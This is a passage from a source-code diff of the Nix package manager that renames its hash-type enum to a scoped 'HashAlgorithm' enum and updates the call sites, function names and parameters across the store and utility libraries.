a/src/libstore/optimise-store.cc +++ b/src/libstore/optimise-store.cc @@ -146,7 +146,7 @@ void LocalStore::optimisePath_(Activity * act, OptimiseStats & stats, Also note that if `path' is a symlink, then we're hashing 
the contents of the symlink (i.e. the result of readlink()), not the contents of the target (which may not even exist). */ - Hash hash = hashPath(htSHA256, path).first; + Hash hash = hashPath(HashAlgorithm::SHA256, path).first; debug("'%1%' has hash '%2%'", path, hash.to_string(HashFormat::Base32, true)); /* Check if this is a known hash. */ @@ -156,7 +156,7 @@ void LocalStore::optimisePath_(Activity * act, OptimiseStats & stats, if (pathExists(linkPath)) { auto stLink = lstat(linkPath); if (st.st_size != stLink.st_size - || (repair && hash != hashPath(htSHA256, linkPath).first)) + || (repair && hash != hashPath(HashAlgorithm::SHA256, linkPath).first)) { // XXX: Consider overwriting linkPath with our valid version. warn("removing corrupted link '%s'", linkPath); diff --git a/src/libstore/path-references.cc b/src/libstore/path-references.cc index 274b596c0..15f52ec9d 100644 --- a/src/libstore/path-references.cc +++ b/src/libstore/path-references.cc @@ -49,7 +49,7 @@ std::pair scanForReferences( const std::string & path, const StorePathSet & refs) { - HashSink hashSink { htSHA256 }; + HashSink hashSink { HashAlgorithm::SHA256 }; auto found = scanForReferences(hashSink, path, refs); auto hash = hashSink.finish(); return std::pair(found, hash); diff --git a/src/libstore/path.cc b/src/libstore/path.cc index 69f6d7356..d5257c939 100644 --- a/src/libstore/path.cc +++ b/src/libstore/path.cc @@ -49,7 +49,7 @@ StorePath StorePath::dummy("ffffffffffffffffffffffffffffffff-x"); StorePath StorePath::random(std::string_view name) { - Hash hash(htSHA1); + Hash hash(HashAlgorithm::SHA1); randombytes_buf(hash.hash, hash.hashSize); return StorePath(hash, name); } diff --git a/src/libstore/remote-store.cc b/src/libstore/remote-store.cc index 3d3919882..cc26c2a94 100644 --- a/src/libstore/remote-store.cc +++ b/src/libstore/remote-store.cc @@ -417,12 +417,12 @@ std::optional RemoteStore::queryPathFromHashPart(const std::string & ref RemoteStore::addCAToStore( - Source & dump, - 
std::string_view name, - ContentAddressMethod caMethod, - HashType hashType, - const StorePathSet & references, - RepairFlag repair) + Source & dump, + std::string_view name, + ContentAddressMethod caMethod, + HashAlgorithm hashAlgo, + const StorePathSet & references, + RepairFlag repair) { std::optional conn_(getConnection()); auto & conn = *conn_; @@ -432,7 +432,7 @@ ref RemoteStore::addCAToStore( conn->to << WorkerProto::Op::AddToStore << name - << caMethod.render(hashType); + << caMethod.render(hashAlgo); WorkerProto::write(*this, *conn, references); conn->to << repair; @@ -453,9 +453,9 @@ ref RemoteStore::addCAToStore( std::visit(overloaded { [&](const TextIngestionMethod & thm) -> void { - if (hashType != htSHA256) + if (hashAlgo != HashAlgorithm::SHA256) throw UnimplementedError("When adding text-hashed data called '%s', only SHA-256 is supported but '%s' was given", - name, printHashType(hashType)); + name, printHashAlgo(hashAlgo)); std::string s = dump.drain(); conn->to << WorkerProto::Op::AddTextToStore << name << s; WorkerProto::write(*this, *conn, references); @@ -465,9 +465,9 @@ ref RemoteStore::addCAToStore( conn->to << WorkerProto::Op::AddToStore << name - << ((hashType == htSHA256 && fim == FileIngestionMethod::Recursive) ? 0 : 1) /* backwards compatibility hack */ + << ((hashAlgo == HashAlgorithm::SHA256 && fim == FileIngestionMethod::Recursive) ? 0 : 1) /* backwards compatibility hack */ << (fim == FileIngestionMethod::Recursive ? 
1 : 0) - << printHashType(hashType); + << printHashAlgo(hashAlgo); try { conn->to.written = 0; @@ -503,9 +503,9 @@ ref RemoteStore::addCAToStore( StorePath RemoteStore::addToStoreFromDump(Source & dump, std::string_view name, - FileIngestionMethod method, HashType hashType, RepairFlag repair, const StorePathSet & references) + FileIngestionMethod method, HashAlgorithm hashAlgo, RepairFlag repair, const StorePathSet & references) { - return addCAToStore(dump, name, method, hashType, references, repair)->path; + return addCAToStore(dump, name, method, hashAlgo, references, repair)->path; } @@ -610,7 +610,7 @@ StorePath RemoteStore::addTextToStore( RepairFlag repair) { StringSource source(s); - return addCAToStore(source, name, TextIngestionMethod {}, htSHA256, references, repair)->path; + return addCAToStore(source, name, TextIngestionMethod {}, HashAlgorithm::SHA256, references, repair)->path; } void RemoteStore::registerDrvOutput(const Realisation & info) diff --git a/src/libstore/remote-store.hh b/src/libstore/remote-store.hh index 1cc11af86..f2e34c1a3 100644 --- a/src/libstore/remote-store.hh +++ b/src/libstore/remote-store.hh @@ -74,18 +74,18 @@ public: * Add a content-addressable store path. `dump` will be drained. */ ref addCAToStore( - Source & dump, - std::string_view name, - ContentAddressMethod caMethod, - HashType hashType, - const StorePathSet & references, - RepairFlag repair); + Source & dump, + std::string_view name, + ContentAddressMethod caMethod, + HashAlgorithm hashAlgo, + const StorePathSet & references, + RepairFlag repair); /** * Add a content-addressable store path. Does not support references. `dump` will be drained. 
*/ StorePath addToStoreFromDump(Source & dump, std::string_view name, - FileIngestionMethod method = FileIngestionMethod::Recursive, HashType hashAlgo = htSHA256, RepairFlag repair = NoRepair, const StorePathSet & references = StorePathSet()) override; + FileIngestionMethod method = FileIngestionMethod::Recursive, HashAlgorithm hashAlgo = HashAlgorithm::SHA256, RepairFlag repair = NoRepair, const StorePathSet & references = StorePathSet()) override; void addToStore(const ValidPathInfo & info, Source & nar, RepairFlag repair, CheckSigsFlag checkSigs) override; diff --git a/src/libstore/store-api.cc b/src/libstore/store-api.cc index 8601e0857..800df7fa0 100644 --- a/src/libstore/store-api.cc +++ b/src/libstore/store-api.cc @@ -153,7 +153,7 @@ StorePath StoreDirConfig::makeStorePath(std::string_view type, /* e.g., "source:sha256:1abc...:/nix/store:foo.tar.gz" */ auto s = std::string(type) + ":" + std::string(hash) + ":" + storeDir + ":" + std::string(name); - auto h = compressHash(hashString(htSHA256, s), 20); + auto h = compressHash(hashString(HashAlgorithm::SHA256, s), 20); return StorePath(h, name); } @@ -191,12 +191,12 @@ static std::string makeType( StorePath StoreDirConfig::makeFixedOutputPath(std::string_view name, const FixedOutputInfo & info) const { - if (info.hash.type == htSHA256 && info.method == FileIngestionMethod::Recursive) { + if (info.hash.algo == HashAlgorithm::SHA256 && info.method == FileIngestionMethod::Recursive) { return makeStorePath(makeType(*this, "source", info.references), info.hash, name); } else { assert(info.references.size() == 0); return makeStorePath("output:out", - hashString(htSHA256, + hashString(HashAlgorithm::SHA256, "fixed:out:" + makeFileIngestionPrefix(info.method) + info.hash.to_string(HashFormat::Base16, true) + ":"), @@ -207,7 +207,7 @@ StorePath StoreDirConfig::makeFixedOutputPath(std::string_view name, const Fixed StorePath StoreDirConfig::makeTextPath(std::string_view name, const TextInfo & info) const { - 
assert(info.hash.type == htSHA256); + assert(info.hash.algo == HashAlgorithm::SHA256); return makeStorePath( makeType(*this, "text", StoreReferences { .others = info.references, @@ -233,11 +233,11 @@ StorePath StoreDirConfig::makeFixedOutputPathFromCA(std::string_view name, const std::pair StoreDirConfig::computeStorePathFromDump( - Source & dump, - std::string_view name, - FileIngestionMethod method, - HashType hashAlgo, - const StorePathSet & references) const + Source & dump, + std::string_view name, + FileIngestionMethod method, + HashAlgorithm hashAlgo, + const StorePathSet & references) const { HashSink sink(hashAlgo); dump.drainInto(sink); @@ -257,20 +257,20 @@ StorePath StoreDirConfig::computeStorePathForText( const StorePathSet & references) const { return makeTextPath(name, TextInfo { - .hash = hashString(htSHA256, s), + .hash = hashString(HashAlgorithm::SHA256, s), .references = references, }); } StorePath Store::addToStore( - std::string_view name, - const Path & _srcPath, - FileIngestionMethod method, - HashType hashAlgo, - PathFilter & filter, - RepairFlag repair, - const StorePathSet & references) + std::string_view name, + const Path & _srcPath, + FileIngestionMethod method, + HashAlgorithm hashAlgo, + PathFilter & filter, + RepairFlag repair, + const StorePathSet & references) { Path srcPath(absPath(_srcPath)); auto source = sinkToSource([&](Sink & sink) { @@ -405,10 +405,10 @@ digraph graphname { } */ ValidPathInfo Store::addToStoreSlow(std::string_view name, const Path & srcPath, - FileIngestionMethod method, HashType hashAlgo, - std::optional expectedCAHash) + FileIngestionMethod method, HashAlgorithm hashAlgo, + std::optional expectedCAHash) { - HashSink narHashSink { htSHA256 }; + HashSink narHashSink { HashAlgorithm::SHA256 }; HashSink caHashSink { hashAlgo }; /* Note that fileSink and unusualHashTee must be mutually exclusive, since @@ -417,7 +417,7 @@ ValidPathInfo Store::addToStoreSlow(std::string_view name, const Path & srcPath, 
RegularFileSink fileSink { caHashSink }; TeeSink unusualHashTee { narHashSink, caHashSink }; - auto & narSink = method == FileIngestionMethod::Recursive && hashAlgo != htSHA256 + auto & narSink = method == FileIngestionMethod::Recursive && hashAlgo != HashAlgorithm::SHA256 ? static_cast(unusualHashTee) : narHashSink; @@ -445,7 +445,7 @@ ValidPathInfo Store::addToStoreSlow(std::string_view name, const Path & srcPath, finish. */ auto [narHash, narSize] = narHashSink.finish(); - auto hash = method == FileIngestionMethod::Recursive && hashAlgo == htSHA256 + auto hash = method == FileIngestionMethod::Recursive && hashAlgo == HashAlgorithm::SHA256 ? narHash : caHashSink.finish().first; @@ -1205,7 +1205,7 @@ std::optional decodeValidPathInfo(const Store & store, std::istre if (!hashGiven) { std::string s; getline(str, s); - auto narHash = Hash::parseAny(s, htSHA256); + auto narHash = Hash::parseAny(s, HashAlgorithm::SHA256); getline(str, s); auto narSize = string2Int(s); if (!narSize) throw Error("number expected"); diff --git a/src/libstore/store-api.hh b/src/libstore/store-api.hh index 5860d0ea6..ada6699d5 100644 --- a/src/libstore/store-api.hh +++ b/src/libstore/store-api.hh @@ -427,13 +427,13 @@ public: * libutil/archive.hh). */ virtual StorePath addToStore( - std::string_view name, - const Path & srcPath, - FileIngestionMethod method = FileIngestionMethod::Recursive, - HashType hashAlgo = htSHA256, - PathFilter & filter = defaultPathFilter, - RepairFlag repair = NoRepair, - const StorePathSet & references = StorePathSet()); + std::string_view name, + const Path & srcPath, + FileIngestionMethod method = FileIngestionMethod::Recursive, + HashAlgorithm hashAlgo = HashAlgorithm::SHA256, + PathFilter & filter = defaultPathFilter, + RepairFlag repair = NoRepair, + const StorePathSet & references = StorePathSet()); /** * Copy the contents of a path to the store and register the @@ -441,8 +441,8 @@ public: * memory. 
*/ ValidPathInfo addToStoreSlow(std::string_view name, const Path & srcPath, - FileIngestionMethod method = FileIngestionMethod::Recursive, HashType hashAlgo = htSHA256, - std::optional expectedCAHash = {}); + FileIngestionMethod method = FileIngestionMethod::Recursive, HashAlgorithm hashAlgo = HashAlgorithm::SHA256, + std::optional expectedCAHash = {}); /** * Like addToStore(), but the contents of the path are contained @@ -454,8 +454,8 @@ public: * \todo remove? */ virtual StorePath addToStoreFromDump(Source & dump, std::string_view name, - FileIngestionMethod method = FileIngestionMethod::Recursive, HashType hashAlgo = htSHA256, RepairFlag repair = NoRepair, - const StorePathSet & references = StorePathSet()) + FileIngestionMethod method = FileIngestionMethod::Recursive, HashAlgorithm hashAlgo = HashAlgorithm::SHA256, RepairFlag repair = NoRepair, + const StorePathSet & references = StorePathSet()) { unsupported("addToStoreFromDump"); } /** diff --git a/src/libstore/store-dir-config.hh b/src/libstore/store-dir-config.hh index 53843d663..8dafca096 100644 --- a/src/libstore/store-dir-config.hh +++ b/src/libstore/store-dir-config.hh @@ -98,7 +98,7 @@ struct StoreDirConfig : public Config Source & dump, std::string_view name, FileIngestionMethod method = FileIngestionMethod::Recursive, - HashType hashAlgo = htSHA256, + HashAlgorithm hashAlgo = HashAlgorithm::SHA256, const StorePathSet & references = {}) const; /** diff --git a/src/libstore/worker-protocol.cc b/src/libstore/worker-protocol.cc index 43654d7e8..2a379e75e 100644 --- a/src/libstore/worker-protocol.cc +++ b/src/libstore/worker-protocol.cc @@ -160,7 +160,7 @@ void WorkerProto::Serialise::write(const StoreDirConfig & store, UnkeyedValidPathInfo WorkerProto::Serialise::read(const StoreDirConfig & store, ReadConn conn) { auto deriver = readString(conn.from); - auto narHash = Hash::parseAny(readString(conn.from), htSHA256); + auto narHash = Hash::parseAny(readString(conn.from), HashAlgorithm::SHA256); 
UnkeyedValidPathInfo info(narHash); if (deriver != "") info.deriver = store.parseStorePath(deriver); info.references = WorkerProto::Serialise::read(store, conn); diff --git a/src/libutil/args.cc b/src/libutil/args.cc index c4b2975ee..ac3727d11 100644 --- a/src/libutil/args.cc +++ b/src/libutil/args.cc @@ -546,32 +546,32 @@ nlohmann::json Args::toJSON() static void hashTypeCompleter(AddCompletions & completions, size_t index, std::string_view prefix) { - for (auto & type : hashTypes) + for (auto & type : hashAlgorithms) if (hasPrefix(type, prefix)) completions.add(type); } -Args::Flag Args::Flag::mkHashTypeFlag(std::string && longName, HashType * ht) +Args::Flag Args::Flag::mkHashTypeFlag(std::string && longName, HashAlgorithm * ha) { return Flag { .longName = std::move(longName), .description = "hash algorithm ('md5', 'sha1', 'sha256', or 'sha512')", .labels = {"hash-algo"}, - .handler = {[ht](std::string s) { - *ht = parseHashType(s); + .handler = {[ha](std::string s) { + *ha = parseHashAlgo(s); }}, .completer = hashTypeCompleter, }; } -Args::Flag Args::Flag::mkHashTypeOptFlag(std::string && longName, std::optional * oht) +Args::Flag Args::Flag::mkHashTypeOptFlag(std::string && longName, std::optional * oha) { return Flag { .longName = std::move(longName), .description = "hash algorithm ('md5', 'sha1', 'sha256', or 'sha512'). 
Optional as can also be gotten from SRI hash itself.", .labels = {"hash-algo"}, - .handler = {[oht](std::string s) { - *oht = std::optional { parseHashType(s) }; + .handler = {[oha](std::string s) { + *oha = std::optional {parseHashAlgo(s) }; }}, .completer = hashTypeCompleter, }; diff --git a/src/libutil/args.hh b/src/libutil/args.hh index 72278dccc..0cff76158 100644 --- a/src/libutil/args.hh +++ b/src/libutil/args.hh @@ -14,7 +14,7 @@ namespace nix { -enum HashType : char; +enum struct HashAlgorithm : char; class MultiCommand; @@ -175,8 +175,8 @@ protected: std::optional experimentalFeature; - static Flag mkHashTypeFlag(std::string && longName, HashType * ht); - static Flag mkHashTypeOptFlag(std::string && longName, std::optional * oht); + static Flag mkHashTypeFlag(std::string && longName, HashAlgorithm * ha); + static Flag mkHashTypeOptFlag(std::string && longName, std::optional * oha); }; /** diff --git a/src/libutil/git.cc b/src/libutil/git.cc index a4bd60096..296b75628 100644 --- a/src/libutil/git.cc +++ b/src/libutil/git.cc @@ -106,7 +106,7 @@ void parse( std::string hashs = getString(source, 20); left -= 20; - Hash hash(htSHA1); + Hash hash(HashAlgorithm::SHA1); std::copy(hashs.begin(), hashs.end(), hash.hash); hook(name, TreeEntry { @@ -241,12 +241,12 @@ Mode dump( TreeEntry dumpHash( - HashType ht, - SourceAccessor & accessor, const CanonPath & path, PathFilter & filter) + HashAlgorithm ha, + SourceAccessor & accessor, const CanonPath & path, PathFilter & filter) { std::function hook; hook = [&](const CanonPath & path) -> TreeEntry { - auto hashSink = HashSink(ht); + auto hashSink = HashSink(ha); auto mode = dump(accessor, path, hashSink, hook, filter); auto hash = hashSink.finish().first; return { diff --git a/src/libutil/git.hh b/src/libutil/git.hh index 303460072..b24b25dd3 100644 --- a/src/libutil/git.hh +++ b/src/libutil/git.hh @@ -123,9 +123,9 @@ Mode dump( * A smaller wrapper around `dump`. 
*/ TreeEntry dumpHash( - HashType ht, - SourceAccessor & accessor, const CanonPath & path, - PathFilter & filter = defaultPathFilter); + HashAlgorithm ha, + SourceAccessor & accessor, const CanonPath & path, + PathFilter & filter = defaultPathFilter); /** * A line from the output of `git ls-remote --symref`. diff --git a/src/libutil/hash.cc b/src/libutil/hash.cc index 144f7ae7e..38a29c459 100644 --- a/src/libutil/hash.cc +++ b/src/libutil/hash.cc @@ -16,23 +16,23 @@ namespace nix { -static size_t regularHashSize(HashType type) { +static size_t regularHashSize(HashAlgorithm type) { switch (type) { - case htMD5: return md5HashSize; - case htSHA1: return sha1HashSize; - case htSHA256: return sha256HashSize; - case htSHA512: return sha512HashSize; + case HashAlgorithm::MD5: return md5HashSize; + case HashAlgorithm::SHA1: return sha1HashSize; + case HashAlgorithm::SHA256: return sha256HashSize; + case HashAlgorithm::SHA512: return sha512HashSize; } abort(); } -std::set hashTypes = { "md5", "sha1", "sha256", "sha512" }; +std::set hashAlgorithms = {"md5", "sha1", "sha256", "sha512" }; -Hash::Hash(HashType type) : type(type) +Hash::Hash(HashAlgorithm algo) : algo(algo) { - hashSize = regularHashSize(type); + hashSize = regularHashSize(algo); assert(hashSize <= maxHashSize); memset(hash, 0, maxHashSize); } @@ -109,16 +109,16 @@ static std::string printHash32(const Hash & hash) std::string printHash16or32(const Hash & hash) { - assert(hash.type); - return hash.to_string(hash.type == htMD5 ? HashFormat::Base16 : HashFormat::Base32, false); + assert(static_cast(hash.algo)); + return hash.to_string(hash.algo == HashAlgorithm::MD5 ? 
HashFormat::Base16 : HashFormat::Base32, false); } -std::string Hash::to_string(HashFormat hashFormat, bool includeType) const +std::string Hash::to_string(HashFormat hashFormat, bool includeAlgo) const { std::string s; - if (hashFormat == HashFormat::SRI || includeType) { - s += printHashType(type); + if (hashFormat == HashFormat::SRI || includeAlgo) { + s += printHashAlgo(algo); s += hashFormat == HashFormat::SRI ? '-' : ':'; } switch (hashFormat) { @@ -136,7 +136,7 @@ std::string Hash::to_string(HashFormat hashFormat, bool includeType) const return s; } -Hash Hash::dummy(htSHA256); +Hash Hash::dummy(HashAlgorithm::SHA256); Hash Hash::parseSRI(std::string_view original) { auto rest = original; @@ -145,18 +145,18 @@ Hash Hash::parseSRI(std::string_view original) { auto hashRaw = splitPrefixTo(rest, '-'); if (!hashRaw) throw BadHash("hash '%s' is not SRI", original); - HashType parsedType = parseHashType(*hashRaw); + HashAlgorithm parsedType = parseHashAlgo(*hashRaw); return Hash(rest, parsedType, true); } // Mutates the string to eliminate the prefixes when found -static std::pair, bool> getParsedTypeAndSRI(std::string_view & rest) +static std::pair, bool> getParsedTypeAndSRI(std::string_view & rest) { bool isSRI = false; // Parse the hash type before the separator, if there was one. 
- std::optional optParsedType; + std::optional optParsedType; { auto hashRaw = splitPrefixTo(rest, ':'); @@ -166,7 +166,7 @@ static std::pair, bool> getParsedTypeAndSRI(std::string_ isSRI = true; } if (hashRaw) - optParsedType = parseHashType(*hashRaw); + optParsedType = parseHashAlgo(*hashRaw); } return {optParsedType, isSRI}; @@ -185,29 +185,29 @@ Hash Hash::parseAnyPrefixed(std::string_view original) return Hash(rest, *optParsedType, isSRI); } -Hash Hash::parseAny(std::string_view original, std::optional optType) +Hash Hash::parseAny(std::string_view original, std::optional optAlgo) { auto rest = original; auto [optParsedType, isSRI] = getParsedTypeAndSRI(rest); // Either the string or user must provide the type, if they both do they // must agree. - if (!optParsedType && !optType) + if (!optParsedType && !optAlgo) throw BadHash("hash '%s' does not include a type, nor is the type otherwise known from context", rest); - else if (optParsedType && optType && *optParsedType != *optType) - throw BadHash("hash '%s' should have type '%s'", original, printHashType(*optType)); + else if (optParsedType && optAlgo && *optParsedType != *optAlgo) + throw BadHash("hash '%s' should have type '%s'", original, printHashAlgo(*optAlgo)); - HashType hashType = optParsedType ? *optParsedType : *optType; - return Hash(rest, hashType, isSRI); + HashAlgorithm hashAlgo = optParsedType ? 
*optParsedType : *optAlgo; + return Hash(rest, hashAlgo, isSRI); } -Hash Hash::parseNonSRIUnprefixed(std::string_view s, HashType type) +Hash Hash::parseNonSRIUnprefixed(std::string_view s, HashAlgorithm algo) { - return Hash(s, type, false); + return Hash(s, algo, false); } -Hash::Hash(std::string_view rest, HashType type, bool isSRI) - : Hash(type) +Hash::Hash(std::string_view rest, HashAlgorithm algo, bool isSRI) + : Hash(algo) { if (!isSRI && rest.size() == base16Len()) { @@ -257,19 +257,19 @@ Hash::Hash(std::string_view rest, HashType type, bool isSRI) } else - throw BadHash("hash '%s' has wrong length for hash type '%s'", rest, printHashType(this->type)); + throw BadHash("hash '%s' has wrong length for hash algorithm '%s'", rest, printHashAlgo(this->algo)); } -Hash newHashAllowEmpty(std::string_view hashStr, std::optional ht) +Hash newHashAllowEmpty(std::string_view hashStr, std::optional ha) { if (hashStr.empty()) { - if (!ht) + if (!ha) throw BadHash("empty hash requires explicit hash type"); - Hash h(*ht); + Hash h(*ha); warn("found empty hash, assuming '%s'", h.to_string(HashFormat::SRI, true)); return h; } else - return Hash::parseAny(hashStr, ht); + return Hash::parseAny(hashStr, ha); } @@ -282,58 +282,58 @@ union Ctx }; -static void start(HashType ht, Ctx & ctx) +static void start(HashAlgorithm ha, Ctx & ctx) { - if (ht == htMD5) MD5_Init(&ctx.md5); - else if (ht == htSHA1) SHA1_Init(&ctx.sha1); - else if (ht == htSHA256) SHA256_Init(&ctx.sha256); - else if (ht == htSHA512) SHA512_Init(&ctx.sha512); + if (ha == HashAlgorithm::MD5) MD5_Init(&ctx.md5); + else if (ha == HashAlgorithm::SHA1) SHA1_Init(&ctx.sha1); + else if (ha == HashAlgorithm::SHA256) SHA256_Init(&ctx.sha256); + else if (ha == HashAlgorithm::SHA512) SHA512_Init(&ctx.sha512); } -static void update(HashType ht, Ctx & ctx, - std::string_view data) +static void update(HashAlgorithm ha, Ctx & ctx, + std::string_view data) { - if (ht == htMD5) MD5_Update(&ctx.md5, data.data(), data.size()); - 
else if (ht == htSHA1) SHA1_Update(&ctx.sha1, data.data(), data.size()); - else if (ht == htSHA256) SHA256_Update(&ctx.sha256, data.data(), data.size()); - else if (ht == htSHA512) SHA512_Update(&ctx.sha512, data.data(), data.size()); + if (ha == HashAlgorithm::MD5) MD5_Update(&ctx.md5, data.data(), data.size()); + else if (ha == HashAlgorithm::SHA1) SHA1_Update(&ctx.sha1, data.data(), data.size()); + else if (ha == HashAlgorithm::SHA256) SHA256_Update(&ctx.sha256, data.data(), data.size()); + else if (ha == HashAlgorithm::SHA512) SHA512_Update(&ctx.sha512, data.data(), data.size()); } -static void finish(HashType ht, Ctx & ctx, unsigned char * hash) +static void finish(HashAlgorithm ha, Ctx & ctx, unsigned char * hash) { - if (ht == htMD5) MD5_Final(hash, &ctx.md5); - else if (ht == htSHA1) SHA1_Final(hash, &ctx.sha1); - else if (ht == htSHA256) SHA256_Final(hash, &ctx.sha256); - else if (ht == htSHA512) SHA512_Final(hash, &ctx.sha512); + if (ha == HashAlgorithm::MD5) MD5_Final(hash, &ctx.md5); + else if (ha == HashAlgorithm::SHA1) SHA1_Final(hash, &ctx.sha1); + else if (ha == HashAlgorithm::SHA256) SHA256_Final(hash, &ctx.sha256); + else if (ha == HashAlgorithm::SHA512) SHA512_Final(hash, &ctx.sha512); } -Hash hashString(HashType ht, std::string_view s) +Hash hashString(HashAlgorithm ha, std::string_view s) { Ctx ctx; - Hash hash(ht); - start(ht, ctx); - update(ht, ctx, s); - finish(ht, ctx, hash.hash); + Hash hash(ha); + start(ha, ctx); + update(ha, ctx, s); + finish(ha, ctx, hash.hash); return hash; } -Hash hashFile(HashType ht, const Path & path) +Hash hashFile(HashAlgorithm ha, const Path & path) { - HashSink sink(ht); + HashSink sink(ha); readFile(path, sink); return sink.finish().first; } -HashSink::HashSink(HashType ht) : ht(ht) +HashSink::HashSink(HashAlgorithm ha) : ha(ha) { ctx = new Ctx; bytes = 0; - start(ht, *ctx); + start(ha, *ctx); } HashSink::~HashSink() @@ -345,14 +345,14 @@ HashSink::~HashSink() void HashSink::writeUnbuffered(std::string_view 
data) { bytes += data.size(); - update(ht, *ctx, data); + update(ha, *ctx, data); } HashResult HashSink::finish() { flush(); - Hash hash(ht); - nix::finish(ht, *ctx, hash.hash); + Hash hash(ha); + nix::finish(ha, *ctx, hash.hash); return HashResult(hash, bytes); } @@ -360,16 +360,16 @@ HashResult HashSink::currentHash() { flush(); Ctx ctx2 = *ctx; - Hash hash(ht); - nix::finish(ht, ctx2, hash.hash); + Hash hash(ha); + nix::finish(ha, ctx2, hash.hash); return HashResult(hash, bytes); } HashResult hashPath( - HashType ht, const Path & path, PathFilter & filter) + HashAlgorithm ha, const Path & path, PathFilter & filter) { - HashSink sink(ht); + HashSink sink(ha); dumpPath(path, sink, filter); return sink.finish(); } @@ -377,7 +377,7 @@ HashResult hashPath( Hash compressHash(const Hash & hash, unsigned int newSize) { - Hash h(hash.type); + Hash h(hash.algo); h.hashSize = newSize; for (unsigned int i = 0; i < hash.hashSize; ++i) h.hash[i % newSize] ^= hash.hash[i]; @@ -420,31 +420,31 @@ std::string_view printHashFormat(HashFormat HashFormat) } } -std::optional parseHashTypeOpt(std::string_view s) +std::optional parseHashAlgoOpt(std::string_view s) { - if (s == "md5") return htMD5; - if (s == "sha1") return htSHA1; - if (s == "sha256") return htSHA256; - if (s == "sha512") return htSHA512; + if (s == "md5") return HashAlgorithm::MD5; + if (s == "sha1") return HashAlgorithm::SHA1; + if (s == "sha256") return HashAlgorithm::SHA256; + if (s == "sha512") return HashAlgorithm::SHA512; return std::nullopt; } -HashType parseHashType(std::string_view s) +HashAlgorithm parseHashAlgo(std::string_view s) { - auto opt_h = parseHashTypeOpt(s); + auto opt_h = parseHashAlgoOpt(s); if (opt_h) return *opt_h; else throw UsageError("unknown hash algorithm '%1%', expect 'md5', 'sha1', 'sha256', or 'sha512'", s); } -std::string_view printHashType(HashType ht) +std::string_view printHashAlgo(HashAlgorithm ha) { - switch (ht) { - case htMD5: return "md5"; - case htSHA1: return "sha1"; - case 
htSHA256: return "sha256"; - case htSHA512: return "sha512"; + switch (ha) { + case HashAlgorithm::MD5: return "md5"; + case HashAlgorithm::SHA1: return "sha1"; + case HashAlgorithm::SHA256: return "sha256"; + case HashAlgorithm::SHA512: return "sha512"; default: // illegal hash type enum value internally, as opposed to external input // which should be validated with nice error message. diff --git a/src/libutil/hash.hh b/src/libutil/hash.hh index 820154e7a..3c97ed4b1 100644 --- a/src/libutil/hash.hh +++ b/src/libutil/hash.hh @@ -12,7 +12,7 @@ namespace nix { MakeError(BadHash, Error); -enum HashType : char { htMD5 = 42, htSHA1, htSHA256, htSHA512 }; +enum struct HashAlgorithm : char { MD5 = 42, SHA1, SHA256, SHA512 }; const int md5HashSize = 16; @@ -20,7 +20,7 @@ const int sha1HashSize = 20; const int sha256HashSize = 32; const int sha512HashSize = 64; -extern std::set hashTypes; +extern std::set hashAlgorithms; extern const std::string base32Chars; @@ -46,12 +46,12 @@ struct Hash size_t hashSize = 0; uint8_t hash[maxHashSize] = {}; - HashType type; + HashAlgorithm algo; /** * Create a zero-filled hash object. */ - explicit Hash(HashType type); + explicit Hash(HashAlgorithm algo); /** * Parse the hash from a string representation in the format @@ -60,7 +60,7 @@ struct Hash * is not present, then the hash type must be specified in the * string. */ - static Hash parseAny(std::string_view s, std::optional type); + static Hash parseAny(std::string_view s, std::optional optAlgo); /** * Parse a hash from a string representation like the above, except the @@ -72,7 +72,7 @@ struct Hash * Parse a plain hash that musst not have any prefix indicating the type. * The type is passed in to disambiguate. 
*/ - static Hash parseNonSRIUnprefixed(std::string_view s, HashType type); + static Hash parseNonSRIUnprefixed(std::string_view s, HashAlgorithm algo); static Hash parseSRI(std::string_view original); @@ -81,7 +81,7 @@ private: * The type must be provided, the string view must not include * prefix. `isSRI` helps disambigate the various base-* encodings. */ - Hash(std::string_view s, HashType type, bool isSRI); + Hash(std::string_view s, HashAlgorithm algo, bool isSRI); public: /** @@ -125,10 +125,10 @@ public: /** * Return a string representation of the hash, in base-16, base-32 - * or base-64. By default, this is prefixed by the hash type + * or base-64. By default, this is prefixed by the hash algo * (e.g. "sha256:"). */ - [[nodiscard]] std::string to_string(HashFormat hashFormat, bool includeType) const; + [[nodiscard]] std::string to_string(HashFormat hashFormat, bool includeAlgo) const; [[nodiscard]] std::string gitRev() const { @@ -146,7 +146,7 @@ public: /** * Helper that defaults empty hashes to the 0 hash. */ -Hash newHashAllowEmpty(std::string_view hashStr, std::optional ht); +Hash newHashAllowEmpty(std::string_view hashStr, std::optional ha); /** * Print a hash in base-16 if it's MD5, or base-32 otherwise. @@ -156,14 +156,14 @@ std::string printHash16or32(const Hash & hash); /** * Compute the hash of the given string. */ -Hash hashString(HashType ht, std::string_view s); +Hash hashString(HashAlgorithm ha, std::string_view s); /** * Compute the hash of the given file, hashing its contents directly. * * (Metadata, such as the executable permission bit, is ignored.) */ -Hash hashFile(HashType ht, const Path & path); +Hash hashFile(HashAlgorithm ha, const Path & path); /** * Compute the hash of the given path, serializing as a Nix Archive and @@ -172,8 +172,8 @@ Hash hashFile(HashType ht, const Path & path); * The hash is defined as (essentially) hashString(ht, dumpPath(path)). 
*/ typedef std::pair HashResult; -HashResult hashPath(HashType ht, const Path & path, - PathFilter & filter = defaultPathFilter); +HashResult hashPath(HashAlgorithm ha, const Path & path, + PathFilter & filter = defaultPathFilter); /** * Compress a hash to the specified number of bytes by cyclically @@ -199,17 +199,17 @@ std::string_view printHashFormat(HashFormat hashFormat); /** * Parse a string representing a hash type. */ -HashType parseHashType(std::string_view s); +HashAlgorithm parseHashAlgo(std::string_view s); /** * Will return nothing on parse error */ -std::optional parseHashTypeOpt(std::string_view s); +std::optional parseHashAlgoOpt(std::string_view s); /** * And the reverse. */ -std::string_view printHashType(HashType ht); +std::string_view printHashAlgo(HashAlgorithm ha); union Ctx; @@ -222,12 +222,12 @@ struct AbstractHashSink : virtual Sink class HashSink : public BufferedSink, public AbstractHashSink { private: - HashType ht; + HashAlgorithm ha; Ctx * ctx; uint64_t bytes; public: - HashSink(HashType ht); + HashSink(HashAlgorithm ha); HashSink(const HashSink & h); ~HashSink(); void writeUnbuffered(std::string_view data) override; diff --git a/src/libutil/references.cc b/src/libutil/references.cc index 9d75606ef..d82d51945 100644 --- a/src/libutil/references.cc +++ b/src/libutil/references.cc @@ -110,8 +110,8 @@ void RewritingSink::flush() prev.clear(); } -HashModuloSink::HashModuloSink(HashType ht, const std::string & modulus) - : hashSink(ht) +HashModuloSink::HashModuloSink(HashAlgorithm ha, const std::string & modulus) + 